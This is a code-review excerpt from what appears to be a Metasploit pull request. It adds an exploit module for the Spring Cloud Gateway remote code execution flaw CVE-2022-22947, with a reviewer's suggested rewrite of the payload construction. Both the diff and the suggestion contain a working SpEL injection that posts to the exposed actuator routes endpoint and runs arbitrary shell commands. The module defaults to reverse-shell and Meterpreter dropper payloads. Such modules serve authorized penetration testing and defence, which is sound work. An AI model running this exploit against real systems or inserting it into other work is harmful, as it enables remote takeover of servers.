modules/exploits/linux/http/spring_cloud_gateway_rce.rb

```diff
@@ -0,0 +1,150 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Spring Cloud Gateway Remote Code Execution',
+        'Description' => %q{
+          This module exploits a Remote Code Execution vulnerability in Spring Cloud Gateway versions = 3.1.0 and 3.0.0 to 3.0.6.
+          The vulnerability can be exploited when the Gateway Actuator endpoint is enabled, exposed and unsecured.
+          An attacker can use SpEL expressions to execute code and take control of the victim machine.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Ayan Saha'
+        ],
+        'References' => [
+          ['CVE', '2022-22947' ],
+          ['URL', 'https://github.com/crowsec-edtech/CVE-2022-22947'],
+          ['URL', 'https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/']
+        ],
+        'Platform' => 'linux',
+        'Arch' => [ARCH_X64, ARCH_CMD],
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
+              }
+            }
+          ],
+          [
+            'Linux (Dropper)',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },
+              'Type' => :linux_dropper
+            }
+          ],
+        ],
+        'DisclosureDate' => '2022-03-03',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK ]
+        }
+      )
+    )
+  end
+
+  def run_command(cmd)
+    formatted_cmd = "echo #{Rex::Text.encode_base64(cmd)} | base64 -d | /bin/sh"
+    route_name = Rex::Text.rand_text_alpha(8).downcase
+    uri = "/actuator/gateway/routes/#{route_name}"
+
+    data = '{"id": "' + route_name + '", "filters": [{"name": "AddResponseHeader", "args": {"name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"/bin/sh\",\"-c\", \"' + formatted_cmd + '\"}).getInputStream()))}"}}], "uri": "http://example.com"}'
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(uri),
+      'ctype' => 'application/json',
+      'data' => data
+    })
```

Comment:
```suggestion
    route_name = Rex::Text.rand_text_alpha(8).downcase
    uri = "/actuator/gateway/routes/#{route_name}"
    value = '#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"/bin/sh","-c", "' + cmd + '"}).getInputStream()))}'

    data = {
      'id' => route_name,
      'filters' => [
        {
          'name' => 'AddResponseHeader',
          'args' =>
            {
              'name' => 'Result',
              'value' => value
            }
        }
      ],
      'uri' => 'http://example.com'
    }

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(uri),
      'ctype' => 'application/json',
      'data' => JSON.generate(data)
    })

```
This change simplifies the json data value and with automatic escaping for quotation marks, it also lets us get rid of the extra base64 and shell calls.